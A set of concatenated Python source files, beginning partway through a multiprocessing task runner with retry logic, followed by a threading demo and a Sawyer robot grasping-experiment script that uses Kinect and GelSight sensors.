def run(self, mrun_load=False, mrun_save=True, retry_fail=0, func_retry_skip=None, func_change=None,
load_fail_result=False, show_stats=True, inline=False, process_timeout=None, *args, **kwargs):
'''
:param mrun_load:
:param mrun_save:
:param retry_fail: 重复失败的结果的次数
:param func_retry_skip: 如果func_retry_spec是函数,则要返回True才重试,如果为None重试所有失败
:param func_change: 可在重试时调整某些参数
:param load_fail_result: --load_fail_result
:param show_stats: 显示概要
:param inline: 非多进程
:param process_timeout: 进程超时
:param args:
:param kwargs:
:return:
'''
self.control['inline'] = inline
self.control['process_timeout'] = process_timeout
self.cache['start_time'] = time.time()
assert isinstance(retry_fail, int), 'retry_fail must be int.'
result_path = self.path_temp / '{}_mrun_result.json'.format(get_caller().stem)
if mrun_load and result_path.exists():
is_ok, results = load_data(result_path)
elif load_fail_result and result_path.exists():
is_ok, results = load_data(result_path)
self.log.info('load results from {} .'.format(result_path))
self.func_kws = [x['kw'] for x in results]
self.func_kws_now = self.func_kws
if retry_fail < 1:
retry_fail = 1
else:
self.func_kws_now = self.func_kws
is_ok, results = self.run_real(inline=inline, process_timeout=process_timeout, *args, **kwargs)
assert is_ok, results
# 重复运行
i = 0
_results = results
# presave_orders = [i for i, x in enumerate(_results)]
# idx_order = {x['idx']: i for i, x in enumerate(results)}
while i < retry_fail:
i += 1
fails = []
# orders = []
for j, x in enumerate(_results):
# ori_order = presave_orders[j]
if x['is_ok']:
continue
if hasattr(func_retry_skip, '__call__') and func_retry_skip(x):
continue
# kw = x['kw']
if func_change and hasattr(func_change, '__call__'):
x['kw'] = func_change(x)
fails.append(x)
# orders.append(ori_order)
if not fails:
self.log.info('There is no failed result need to be retried.\n'.format(len(fails), i))
break
self.func_kws_now = [x['kw'] for x in fails[:]]
self.log.info('*** Retry {} failed tasks in {} times !!! ***\n'.format(len(fails), i))
try_start_time = time.time()
is_ok, _results = self.run_real(*args, **kwargs)
assert is_ok, _results
# 有些miss result的,需要补上order_out
order_out_last = max([x.get('order_out', 0) for x in results])
for j, x in enumerate(_results):
# ori_order = presave_orders[j]
d = {'retry': i}
d.update({k: v for k, v in x.items() if k in ['is_ok', 'result', 'timer', 'kw']})
fails[j].update(d)
# results[ori_order].update(d)
if 'order_out' not in fails[j] and 'order_out' in x: # 有可能retry时,又miss了
fails[j]['order_out'] = x['order_out'] + order_out_last
# presave_orders = orders
retry_time = round(time.time() - try_start_time, 2)
self.cache['timer_retry'].append(retry_time)
if mrun_save:
dump_data(results, result_path)
self.results = results
self.cache['timer_mrun'] = round(time.time() - self.cache['start_time'], 2)
self.show_miss()
self.stat_results(results)
if show_stats:
self.show_results()
return is_ok, results
def run_real(self, inline=False, process_timeout=None):
'''
:param process_timeout: 进程超时
:param inline: 非多进程
:return:
{
'is_ok': False,
'miss': True,
'result': 'result is not exist.',
'order_in': n,
'order_out': n,
'kw': {}
}
'''
if not inline:
m = Manager()
self.q_input = m.Queue()
self.q_output = m.Queue()
self.timer = m.dict()
else:
self.q_input = []
self.q_output = []
self.timer = {}
assert isinstance(self.func_kws_now, list), 'func_kws is not list.'
idxes = OrderedDict()
for i, kw in enumerate(self.func_kws_now, 1):
idx = id(kw)
kw.update(self.func_common_kw)
d = {'order_in': i, 'idx': idx, 'kw': kw}
idxes[idx] = d
if not inline:
self.q_input.put(d)
else:
self.q_input.append(d)
if inline:
self.job(1, inline=True)
else:
process_num = min(self.default('process_num'), len(self.func_kws_now))
self.cache['process_num_use'] = process_num
self.show_debug('start {} process.'.format(process_num))
ps = []
for process_i in range(1, process_num + 1):
process = Process(target=self.job, args=([process_i, False]))
ps.append(process)
process.start()
for i, p in enumerate(ps):
p.join(timeout=process_timeout)
if process_timeout:
for i, p in enumerate(ps, 1):
if p.is_alive():
self.show_process_debug('terminate process {}.'.format(i))
p.terminate()
outputs = {}
if not inline:
for i in range(1, self.q_output.qsize() + 1):
d = self.q_output.get_nowait()
d['order_out'] = i
outputs[d['idx']] = d
else:
for i, d in enumerate(self.q_output):
d['order_out'] = i + 1
outputs[d['idx']] = d
results = []
now = time.time()
for idx, d in idxes.items():
if idx in outputs:
results.append(outputs[idx])
else:
d1 = {'is_ok': False,
'miss': True,
'result': 'result is not exist.',
'order_in': d['order_in'],
'kw': d['kw'],
'timer': round((now - self.timer[idx]) if self.timer.get(idx) else 9999, 2),
}
results.append(d1)
# results = [outputs.get(idx, {'is_ok': False, 'miss': True, 'result': 'result is not exist.',
# 'order_in': d['order_in'],t
# 'kw': d['kw']}) for idx, d in idxes.items()]
return True, results
def show_process_debug(self, *obj):
self.show_by_flag(self.default('show_process'), *obj)
def show_miss(self):
for i, x in enumerate(self.results):
if x.get('miss'):
self.log_error('miss result. {}'.format(x['kw']))
def stat_results(self, results):
for x in results:
if x.get('miss'):
self.stat['miss'] += 1
continue
if x['is_ok']:
self.stat['success'] += 1
else:
self.stat['fail'] += 1
l = [{'id': i, 'timer': x['timer'], 'miss': x.get('miss'), 'is_ok': x['is_ok']} for i, x in enumerate(results)]
l.sort(key=lambda v: v['timer'], reverse=True)
self.stat['timer'].update({'top': [x['id'] for x in l],
'top_success': [x['id'] for x in l if x['is_ok']],
'top_fail': [x['id'] for x in l if not x.get('miss') and not x['is_ok']],
'top_miss': [x['id'] for x in l if x.get('miss')]})
def stat_results1(self, results):
timer_max = None
timer_min = None
timer_max_miss = None
timer_max_fail = None
for x in results:
if x.get('miss'):
self.stat['miss'] += 1
if not timer_max_miss or x['timer'] > timer_max_miss['timer']:
timer_max_miss = x
continue
if x['is_ok']:
self.stat['success'] += 1
if not timer_max or x['timer'] > timer_max['timer']:
timer_max = x
if not timer_min or x['timer'] < timer_min['timer']:
timer_min = x
else:
self.stat['fail'] += 1
if not timer_max_fail or x['timer'] > timer_max_fail['timer']:
timer_max_fail = x
self.stat['timer'].update({'timer_max': timer_max, 'timer_min': timer_min, 'timer_max_miss': timer_max_miss,
'timer_max_fail': timer_max_fail})
def show_results(self):
msg = 'Total: {total}, Success: {success}, Fail: {fail}, Miss: {miss}. '.format(**self.stat)
msg += 'Duration: {timer_mrun}s, Process: {process_num}, Timeout: {process_timeout}, Inline: {inline}.'.format(
**self.cache, **self.control)
if self.cache['timer_retry']:
msg += ', including '
l = []
for i, x in enumerate(self.cache['timer_retry']):
l.append('retry{}: {}s'.format(i + 1, x))
msg += ', '.join(l)
if l:
msg += '.'
self.log.info(msg)
def update_results(self, model, key, datas=None, sql=None, last_cols=None, timed=True, ret_str=True):
'''
:param model: 结果表
:param datas: 运行结果, 默认取self.results
:param key: 主键
:param sql: 如果无sql,则返回表格数据
:param last_cols: [col1, col2], 更新时需要保留的上一次状态。model中需要有 col1_last, col2_last字段
:param timed: 记录时间
:param ret_str:
:return:
'''
if model.__class__ == MyModel:
mm = model
else:
mm = MyModel(model, db_session=self.db_session)
if not datas:
datas = self.results
if not last_cols:
last_cols = [col.replace('_last', '') for col in mm.cols_name if col.endswith('_last')]
if sql:
is_ok, data_old = mm.query(sql=sql, key=key)
else:
is_ok, data_old = mm.query(key=key)
for i, v in enumerate(datas):
k = key(v) if hasattr(key, '__call__') else v[key]
if k in data_old:
_keys = list(v.keys())
for col in _keys:
if col not in mm.cols_name:
continue
if col in last_cols:
v['{}_last'.format(col)] = data_old[k][col]
count_fail_col = 'failed'
if 'is_ok' in v and count_fail_col in mm.cols_name:
if k in data_old:
_count = data_old[k][count_fail_col]
if not _count:
_count = 0
else:
_count = 0
if not v['is_ok']:
v[count_fail_col] = _count + 1
else:
v[count_fail_col] = _count
if 'is_ok' in v:
v['is_ok'] = 1 if v['is_ok'] else 0
is_ok, result = mm.update(data_new=datas, data_old=data_old, key=key, timed=timed, ret_str=ret_str)
return is_ok, result
class MrunArgParse(ArgParseClass):
def __init__(self, process_num=60, process_timeout=60, *args, **kwargs):
ArgParseClass.__init__(self, *args, **kwargs)
self.process_num = process_num
self.process_timeout = process_timeout
def add_multi(self, group='Multi Process', process_num=None, process_timeout=None):
self.add('--process_num', type=int, default=process_num or self.process_num,
help='进程数量,{}'.format(process_num or self.process_num),
group=group)
self.add('--process_timeout', type=int, default=process_timeout or self.process_timeout,
help='进程超时时间, default {}s'.format(process_timeout or self.process_timeout), group=group)
self.add('--inline', action='store_true', default=False, help='串行模式', group=group)
self.add('--show_process', action='store_true', default=False, help='显示进程操作过程', group=group)
self.add('--retry_fail', type=int, default=0, help='重试失败次数,默认0', group=group)
self.add('--load_fail_result', action='store_true', default=False, help='载入原先失败的结果', group=group)
self.add('--mrun_load', action='store_true', default=False, help='载入原先的结果', group=group)
# def add_all(self):
# self.add_base(self)
# self.add_multi()
if __name__ == '__main__':
def test(i):
# must return is_ok, message
t = randint(0, 3)
time.sleep(t)
msg = 'i am {}, waiting {}.'.format(i, t)
print(msg)
return True, msg
mr = MultiRun(func=test, func_kws=[{'i': x} for x in range(5)], process_num=3,
add_log_to_common_kw=True)
print(mr.run(inline=False))
|
io_bound_threading.py | import time
import threading
def io_bound_job(job_id, num_requests):
start_job = time.time()
print(f"IO-bound sub-job {job_id} started.")
for _ in range(num_requests):
# IO-bound jobs spend most of the time waiting for responses.
time.sleep(3)
duration = time.time() - start_job
print(f"IO-bound sub-job {job_id} finished in {duration:.2f} seconds.")
def run_with_threads(n_jobs, num_requests_per_job):
threads = []
for _id in range(n_jobs):
thread = threading.Thread(target=io_bound_job, args=(_id, num_requests_per_job))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
start_one_thread = time.time()
# Run with a single thread:
run_with_threads(n_jobs=1, num_requests_per_job=3)
duration = time.time() - start_one_thread
print(f"IO-bound job finished in {duration:.2f} seconds with a single thread.")
start_three_threads = time.time()
# Run with three threads:
run_with_threads(n_jobs=3, num_requests_per_job=1)
duration = time.time() - start_three_threads
print(f"IO-bound job finished in {duration:.2f} seconds with three threads.")
# IO-bound sub-job 0 started.
# IO-bound sub-job 0 finished in 9.01 seconds.
# IO-bound job finished in 9.01 seconds with a single thread.
# IO-bound sub-job 0 started.
# IO-bound sub-job 1 started.
# IO-bound sub-job 2 started.
# IO-bound sub-job 0 finished in 3.00 seconds.
# IO-bound sub-job 1 finished in 3.00 seconds.
# IO-bound sub-job 2 finished in 3.00 seconds.
# IO-bound job finished in 3.00 seconds with three threads.
|
run_experiment_nordri_torque_control.py | #!/usr/bin/env python
import grip_and_record.inverse_kin
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from data_recorder_and_torque_controller import DataRecorder_TorqueController as DR_TC
import data_recorder_and_torque_controller as dr
from grip_and_record.robot_utils import Orientations
import rospy
import intera_interface
from intera_interface import CHECK_VERSION
from intera_interface import (
Gripper,
Lights,
Cuff,
RobotParams,
)
import numpy as np
from transform import transform
import time
import grip_and_record.getch
import grip_and_record.locate_cylinder
import os
import matplotlib.pyplot as plt
from KinectA import KinectA
from KinectB import KinectB
import logging
import threading
from GelSightA import GelSightA
from GelSightB import GelSightB
import WSG50_manu
import tensorflow_model_is_gripping.press as press
import pylab
import cv2
import time
import random
import multiprocessing
import tensorflow_model_is_gripping.aolib.util as ut
from sensor_msgs.msg import JointState
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# To log file
fh = logging.FileHandler('run_experiment.log')
fh.setLevel(logging.DEBUG)
logger.addHandler(fh)
__version__ = '1.0.1'
# Parameters experiment
###############################
COMPUTE_BG = False # Store a new background image
save_parallel = False
bounds_table = np.array([[0.45, 0.65], [-0.25, 0.25]]) # X(min, max), Y(min, max) # TODO: this is too small!!!
grasping_force = [4, 25] # min, max of the force [N] applied by the gripper when trying to grasp the object # max = 25
time_waiting_in_air = 4 # Number of seconds the object is held in the air to determine if the grasp is stable.
xyz_bias = [0.005, -0.01, 0] # bias to compensate for kinect-sawyer calibration inaccuracies
###############################
# Parameters Gripper
###############################
# Gelsight adaptor v1
# lower_bound_z = 0.21 # When using the v1 of the weiss_gelsight_adaptor (the short one, with large grasp)
# height_gripper = 0.08 # v1 of the weiss_gelsight_adaptor
# Gelsight adaptor v2
lower_bound_z = 0.242 # When using the v2 of the weiss_gelsight_adaptor (the tall one, with smaller grasp)
height_gripper = 0.11 # v2 of the weiss_gelsight_adaptor
###############################
# Pick the name of the object #
###############################
# name = 'peptobismol'
# name = 'soda_can'
# name = 'purple_meausure_1_cup'
# name = 'green_plastic_cup'
# name = "soft_red_cube"
# name = "soft_elephant"
# name = "soft_zebra"
# name = "blue_cup"
# name = "wooden_pyramid"
# name = "french_dip"
# name = "red_bull"
# name = "metal_can"
# name = "spam"
# name = "soft_blue_cylinder"
# name = "wooden_cube"
# name = "soda_can"
# name = "rubics_cube"
# name = "plastic_duck"
# name = "glass_candle_holder"
# name = "black_metallic_candle_cage"
# name = "aspirin"
# name = "ponds_dry_skin_cream"
# name = "edge_shave_gel"
# name = "ogx_shampoo"
# name = "isopropyl_alcohol"
# name = "baby_cup" # form IKEA
# name = "kong_dog_toy"
# name = "dark_blue_sphere"
# name = "bandaid_box"
# name = "angry_bird"
# name = "hand_soap" # cylinder-fitting fails
# name = "plastic_whale"
name = "plastic_cow"
# name = "monster_truck"
# name = "plastic_mushroom"
# name = "mesh_container" #-> basket?
# name = "bag_pack" #-> forslutas (?)
# name = "chocolate_shake"
# name = "brown_paper_cup"
# name = "brown_paper_cup_2_upside" # Two stacked
# name = "toy_person_with_hat" # bad, too small
# name = "webcam_box"
# name = "playdoh_container"
# name = "pig"
# name = "stuffed_beachball"
# name = "tuna_can"
# name = "bottom_of_black_metallic_candle_cage" # fails
# name = "metal_cylinder_with_holes"
# name = "set_small_plastic_men_yellow_construction_worker"
# name = "wiry_sphere"
# name = "translucent_turquoise_cup" # cylinder-fitting overestimates size (maybe due to translucency)
# name = "green_and_black_sphere"
# name = "blue_translucent_glass_cup" #cylinder-fitting totally failed here
# name = "plastic_sheep"
# name = 'feathered_ball'
# name = "plastic_chicken"
# name = 'blueish_plastic_cup'
# name = "set_small_plastic_men_police_man"
# name = "set_small_plastic_men_red_racer"
# name = "set_small_plastic_men_blue_guy"
# name = "set_small_plastic_men_green_guy"
# name = 'orange_plastic_castle' # -> from the toy box in the cabinet
# name = 'pink_glass_glass' # the one painted by roberto
# name = 'blue_painted_glass'
# name = 'soft_blue_hexagon'
# name = "egg_crate_foam"
# name = "dog_toy_ice_cream_cone"
# name = "onion"
# name = "axe_body_spray"
# name = "candle_in_glass"
# name = "tomato_paste_in_metal_can"
# name = "small_coffe_cup" # <- ideal caffe stagnitta
# name = "yellow_wooden_robot"
# name = "international_travel_adapter"
# name = "lemon"
# name = "muffin"
# name = "lime"
# name = "potato"
# name = "red_apple"
# name = '3d_printed_blue_connector'
# name = 'board_eraser'
# name = 'peppermint_altoids_box'
# name = 'durabuilt_measuring_tape'
# name = "moroccan_mint_tea_box"
# name = "pink_blue_coke_bottle"
# name = "emergency_stop_button_for_sawyer"
# name = 'froot_loops'
# name = 'pino_silvestre' # -> green glass parfume
# name = 'monofilament_line'
# name = 'plastic_watering_can'
# name = 'red_turtle'
# name = '3d_printed_blue_house'
# name = '3d_printed_blue_vase'
# name = '3d_printed_black_cylinder_gear'
# name = "3d_printed_white_ball"
# name = "black_plastic_half_cylinder"
# name = "white_mini_american_hat"
# name = "logitech_wireless_mouse"
# name = "purple_small_plastic_fruit"
# name = "cinnamon"
# name = 'calcium_antacid'
# Best objects:
# brown_paper_cup_2_upside
def init_robot(limb_name):
epilog = """
See help inside the example with the '?' key for key bindings.
"""
rp = intera_interface.RobotParams()
valid_limbs = rp.get_limb_names()
if not valid_limbs:
rp.log_message(("Cannot detect any limb parameters on this robot. "
"Exiting."), "ERROR")
return
rp.log_message('Initializing node... ')
rospy.init_node("move_and_grip")
rp.log_message('Getting robot state... ')
rs = intera_interface.RobotEnable(CHECK_VERSION)
init_state = rs.state().enabled
def clean_shutdown():
print("\nExiting example.")
if not init_state:
rp.log_message('Disabling robot...')
rs.disable()
rospy.on_shutdown(clean_shutdown)
rospy.loginfo("Enabling robot...")
rs.enable()
if not limb_name in valid_limbs:
rp.log_message(("Right is not a valid limb on this robot. "
"Exiting."), "ERROR")
return
limb = intera_interface.Limb(limb_name)
limb.set_joint_position_speed(0.25)
goto_rest_pos(limb)
return limb
def init_gripper():
return WSG50_manu.WSG50()
def wait_for_key():
rp = intera_interface.RobotParams() # For logging
rp.log_message("Press ESC to continue...")
done = False
while not done and not rospy.is_shutdown():
c = grip_and_record.getch.getch()
if c:
if c in ['\x1b', '\x03']:
done = True
def goto_rest_pos(limb, joint_pos_publisher=None, torque=False, speed=0.1):
orientation = Orientations.DOWNWARD_ROTATED
xyz_rest = np.array([0.50, 0.50, 0.60])
if torque:
goto_EE_xyz(limb=limb, joint_pos_publisher=joint_pos_publisher, goal_xyz=xyz_rest, goal_orientation=orientation,
speed=speed, rest_pos=True)
else:
des_pose = grip_and_record.inverse_kin.get_pose(xyz_rest[0], xyz_rest[1], xyz_rest[2], orientation)
curr_pos = limb.joint_angles() # Measure current position
joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, limb.name, curr_pos,
use_advanced_options=True) # gets joint positions
limb.move_to_joint_positions(joint_positions) # Send the command to the arm
def goto_EE_xyz(limb, joint_pos_publisher, goal_xyz, goal_orientation, speed=0.1, rest_pos=False):
rp = intera_interface.RobotParams() # For logging
rp.log_message('Moving to x=%f y=%f z=%f' % (goal_xyz[0], goal_xyz[1], goal_xyz[2]))
if not rest_pos:
# Make sure that the XYZ position is valid, and doesn't collide with the cage
assert (goal_xyz[0] >= bounds_table[0, 0]) and (goal_xyz[0] <= bounds_table[0, 1]), 'X is outside of the bounds'
assert (goal_xyz[1] >= bounds_table[1, 0]) and (goal_xyz[1] <= bounds_table[1, 1]), 'Y is outside of the bounds'
assert (goal_xyz[2] >= lower_bound_z), 'Z is outside of the bounds'
number_of_interpolation_points = 20 # min is 2
frac = np.linspace(start=0, stop=1, num=number_of_interpolation_points)
start_pos = limb.endpoint_pose()
start_xyz = np.array([start_pos["position"].x, start_pos["position"].y, start_pos["position"].z])
start_angle = start_pos["orientation"].y
# dist = np.linalg.norm(goal_xyz - start_xyz) + np.abs(goal_orientation.y - start_angle) + 0.001
dist = np.linalg.norm(goal_xyz - start_xyz) + 0.01
total_time = dist / float(speed)
start_time = time.time()
js = JointState()
js.name = limb.joint_names()
for alpha in frac:
time_elapsed = time.time() - start_time
dest_xyz = start_xyz * (1 - alpha) + goal_xyz * alpha
# dest_angle = start_angle * (1 - alpha) + goal_orientation.y * alpha
# dest_orientation = orientation_downward(dest_angle)
des_pose = grip_and_record.inverse_kin.get_pose(dest_xyz[0], dest_xyz[1], dest_xyz[2], goal_orientation)
seed = limb.joint_angles() # Measure current position
des_joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, limb.name, seed,
use_advanced_options=True) # gets joint positions
js.position = [des_joint_positions[n] for n in js.name]
joint_pos_publisher.publish(js)
if time_elapsed < alpha * total_time:
time.sleep(alpha * total_time - time_elapsed)
def grasp_object(gripper, data_recorder):
"""
Close the gripper to grasp an object, up to the desired gasping force.
:param gripper:
:return:
"""
force = random.randint(grasping_force[0], grasping_force[1])
data_recorder.set_set_gripping_force(force)
print("Setting gripping force:", force)
gripper.set_force(force)
gripper.graspmove_nopending(width=5, speed=50)
time.sleep(2)
def orientation_downward(angle):
"""
Return the quaternion for the gripper orientation
:param angle: [rad]
:return:
"""
angle = np.remainder(angle, np.pi) # Remap any angle to [0, +pi]
orientation = Quaternion(
x=1,
y=angle,
z=0,
w=0,
)
return orientation
def sample_from_cylinder(xy, height_object=0.25, radius=0.1):
"""
Randomly sample a grasping position from a cylinder
:param xy: x,y coordinates of the base/center of the cylinder
:param height_object: height of the cylinder
:param radius: radius of the cylinder
:return:
"""
approach = 2
xy = np.array(xy)
# TODO: assert things are the right dimension
if approach == 1:
# Approach 1: sample two points from the circumference, and the grasp is the line connecting them
angles = np.random.uniform(0, 2 * np.pi, 2) # sample 2 points in terms of angles [rad]
xy_points = xy + [radius * np.sin(angles), radius * np.cos(angles)] # convert them to xy position
# compute line between points and corresponding EE position
des_xy = np.sum(xy_points, 0) / 2 # Middle point
angle_gripper = np.pi / 2 + (np.pi - (angles[1] - angles[0]) / 2) + angles[
0] # TODO: compute angle gripper y = ax + b
# rp.log_message('Moving to x=%f y=%f z=%f' % (des_xy[0], des[1], xyz[2]))
angle_gripper = 0
orientation = orientation_downward(angle=angle_gripper)
xyz = np.array([des_xy[0], des_xy[1], 0.25]) # fix height
if approach == 2:
# Approach 2: directly sample angle and shift
xy_noise = 0.001
shift = np.random.uniform(low=-xy_noise, high=xy_noise, size=3)
shift_z_min = np.maximum(0.01, height_object - height_gripper) # make sure that we don't hit with the gripper
shift_z_max = height_object - 0.015 # small bias to avoid grasping air
shift[2] = np.random.uniform(low=shift_z_min, high=shift_z_max)
shift[2] = np.maximum(0, shift[2]) # Just for safety
# print('Z = [%f,%f] => %f' %(shift_z_min, shift_z_max, shift[2]))
xyz = np.array([xy[0], xy[1], lower_bound_z]) + shift + xyz_bias
orientation = orientation_downward(angle=np.random.uniform(0, np.pi))
return xyz, orientation
def main():
print('Make sure the correct object is printed below.')
print('Object: %s' % name)
rp = intera_interface.RobotParams() # For logging
rp.log_message('')
rp.log_message('Launch topics for gripper')
rp.log_message('Please run the following command in a new terminal:')
rp.log_message('roslaunch wsg_50_driver wsg_50_tcp_script.launch')
rp.log_message('')
# Requesting to start topics for KinectA
rp.log_message('Launch topics for KinectA')
rp.log_message('Please run the following command in a new terminal (in intera mode):')
rp.log_message('rosrun kinect2_bridge kinect2_bridge')
rp.log_message('')
# Requesting to start topics for KinectB
rp.log_message('Launch topics for KinectB')
rp.log_message('Please run the following command in a new terminal (in intera mode) on the kinectbox02:')
# rp.log_message('ssh k2')
# rp.log_message('for pid in $(ps -ef | grep "kinect2_bridge" | awk "{print $2}"); do kill -9 $pid; done')
rp.log_message('/home/rail/ros_ws/src/manu_kinect/start_KinectB.sh')
rp.log_message('')
# Start Topic for the Gelsights
rp.log_message('Launch topic for GelsightA')
rp.log_message('Please run the following command in a new terminal (in intera mode):')
rp.log_message('roslaunch manu_sawyer gelsightA_driver.launch')
rp.log_message('')
rp.log_message('Launch topic for GelsightB')
rp.log_message('Please run the following command in a new terminal (in intera mode):')
rp.log_message('roslaunch manu_sawyer gelsightB_driver.launch')
rp.log_message('')
# Requests the user to place the object to be griped on the table.
rp.log_message('Place the object to grasp on the table.')
wait_for_key()
# Make required initiations
limb_name = "right"
limb = init_robot(limb_name=limb_name)
gripper = init_gripper()
gelSightA = GelSightA()
gelSightB = GelSightB()
kinectA = KinectA(save_init=COMPUTE_BG)
kinectB = KinectB()
time.sleep(1)
from multiprocessing.pool import ThreadPool
pool = multiprocessing.pool.ThreadPool(processes=1)
# Classifier for determining if gripper is gripping, using GelSight images.
model_path = "/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-4600" # net.tf-2600
net = press.NetClf(model_path, "/gpu:0")
net.init()
# NEW STUFF
dr_tc = DR_TC(limb=limb, gripper=gripper, GelSightA=gelSightA, GelSightB=gelSightB, KinectA=kinectA,
KinectB=kinectB)
thread = threading.Thread(target=dr_tc.attach_springs)
thread.start()
time.sleep(4)
desired_joint_pos_publisher = rospy.Publisher('desired_joint_pos', JointState, queue_size=1)
# Setup for main loop #
# For plotting purposes
Iter = 0
fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)
# Whether to randomize gripper position and orientation or not when gripping the object
randomize_gripper_position = True
# Condition variable for the loop
run = True
#################
# The main loop #
#################
comp_task = None
while run:
Iter += 1
start_time = rospy.get_time()
# Fit a cylinder around the object with the Kinect and get location, etc.
rp.log_message('Waiting for Kinect to stabilize')
time.sleep(0.5)
rp.log_message('Done')
xyz_kinect, height_object, radius, obj_vis = kinectA.calc_object_loc()
# Initialize recording to file
nameFile = time.strftime("%Y-%m-%d_%H%M%S")
dr_tc.init_record(nameFile=nameFile)
# Record cylinder data
dr_tc.set_cylinder_data(xyz_kinect, height_object, radius)
# Save the name of the object
dr_tc.set_object_name(name)
# Gettig image from KinectB
top_img = kinectB.get_color_image()
top_img = cv2.cvtColor(top_img, cv2.COLOR_BGR2RGB)
# Get image from GelSight
# GelSightA
gelA_img_r_ini = gelSightA.get_image()
gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB)
# GelSightB
gelB_img_r_ini = gelSightB.get_image()
gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB)
# Plot result from Kinect for visualisation of fitted cylinder
# Plot pic from GelSight
if Iter == 1:
kinA_img = ax1.imshow(obj_vis)
kinB_img = ax2.imshow(top_img)
gelA_img = ax3.imshow(gelA_img_r_ini)
gelB_img = ax4.imshow(gelB_img_r_ini)
ax1.axis('off')
ax2.axis('off')
ax3.axis('off')
ax4.axis('off')
else:
kinA_img.set_data(obj_vis)
kinB_img.set_data(top_img)
gelA_img.set_data(gelA_img_r_ini)
gelB_img.set_data(gelB_img_r_ini)
plt.draw()
plt.ion()
plt.show()
# Transform from Kinect coordinates to Sawyer coordinates
xyz_sawyer = transform(xyz_kinect[0], xyz_kinect[1], xyz_kinect[2]).reshape(3)
# If randomize_gripper_position is True, we grip the object with some randomness
if randomize_gripper_position:
# Sample randomized gripper position based on the fitted cylinder data
des_EE_xyz, des_orientation_EE = sample_from_cylinder(xyz_sawyer[0:2], height_object, radius)
des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.18])
else:
des_orientation_EE = Orientations.DOWNWARD_ROTATED
des_EE_xyz = xyz_sawyer
des_EE_xyz[2] = lower_bound_z + height_object / 2
des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.18])
# Move above the object
goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=Orientations.DOWNWARD_ROTATED, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
# Rotate the gripper
goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.2)
# Record the time pre grasping
time_pre_grasping = rospy.get_time()
dr_tc.set_time_pre_grasping(time_pre_grasping)
# Move down to the object and record the location of the EE
goto_EE_xyz(goal_xyz=des_EE_xyz, goal_orientation=des_orientation_EE, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
dr_tc.set_location_of_EE_at_grasping(des_EE_xyz)
dr_tc.set_angle_of_EE_at_grasping(des_orientation_EE.y)
# Grasp the object and record the time
grasp_object(gripper, dr_tc)
time.sleep(0.5) # This is crucial!!!! keep it!
time_at_grasping = rospy.get_time()
dr_tc.set_time_at_grasping(time_at_grasping)
# Get image from GelSights and update plot
gelA_img_r = gelSightA.get_image()
gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
gelB_img_r = gelSightB.get_image()
gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
gelA_img.set_data(gelA_img_r)
gelB_img.set_data(gelB_img_r)
plt.draw()
plt.ion()
plt.show()
# Raise the object slightly above current position
goto_EE_xyz(goal_xyz=des_EE_xyz_above, goal_orientation=des_orientation_EE, limb=limb,
joint_pos_publisher=desired_joint_pos_publisher, speed=0.1)
time.sleep(0.5)
# Get image from GelSights and update plot
gelA_img_r = gelSightA.get_image()
gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
gelB_img_r = gelSightB.get_image()
gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
gelA_img.set_data(gelA_img_r)
gelB_img.set_data(gelB_img_r)
plt.draw()
plt.ion()
plt.show()
# Record the time
time_post1_grasping = rospy.get_time()
dr_tc.set_time_post1_grasping(time_post1_grasping)
# Wait a little
time.sleep(time_waiting_in_air)
# Check whether the object still is in the gripper
gelA_img_r = gelSightA.get_image()
gelB_img_r = gelSightB.get_image()
pred_A = net.predict(gelA_img_r, gelA_img_r_ini)
pred_B = net.predict(gelB_img_r, gelB_img_r_ini)
dr_tc.set_probability_A(pred_A)
dr_tc.set_probability_B(pred_B)
print("Pred A:", pred_A)
print("Pred B:", pred_B)
gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB)
gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB)
gelA_img.set_data(gelA_img_r)
gelB_img.set_data(gelB_img_r)
plt.draw()
plt.ion()
plt.show()
is_gripping_A = False
if pred_A >= 0.8:
is_gripping_A = True
is_gripping_B = False
if pred_B >= 0.8:
is_gripping_B = True
is_gripping_gripper = False
gripper_force = gripper.get_force()
if gripper_force >= 2:
is_gripping_gripper = True
print("Getting gripping force:", gripper_force)
is_gripping = is_gripping_A or is_gripping_B or is_gripping_gripper
# is_gripping = is_gripping_A or is_gripping_gripper
rp.log_message('Am I gripping? %s' % is_gripping)
# Record the result
dr_tc.set_is_gripping(is_gripping)
# Record the time
time_post2_grasping = rospy.get_time()
dr_tc.set_time_post2_grasping(time_post2_grasping)
if is_gripping:
# If we are still gripping the object we return object to the ground at a random location
# Compute random x and y coordinates
r_x = np.random.uniform(0.15, 0.85, 1)
r_y = np.random.uniform(0.15, 0.85, 1)
x_min = bounds_table[0, 0]
x_max = bounds_table[0, 1]
y_min = bounds_table[1, 0]
y_max = bounds_table[1, 1]
x_r = r_x * x_min + (1 - r_x) * x_max
y_r = r_y * y_min + (1 - r_y) * y_max
# (comment below to go back to the original position)
des_EE_xyz = np.array((x_r, y_r, des_EE_xyz[2]))
# Move above the new random position
des_EE_xyz_above = des_EE_xyz.copy()
des_EE_xyz_above[2] = des_EE_xyz[2] + 0.2
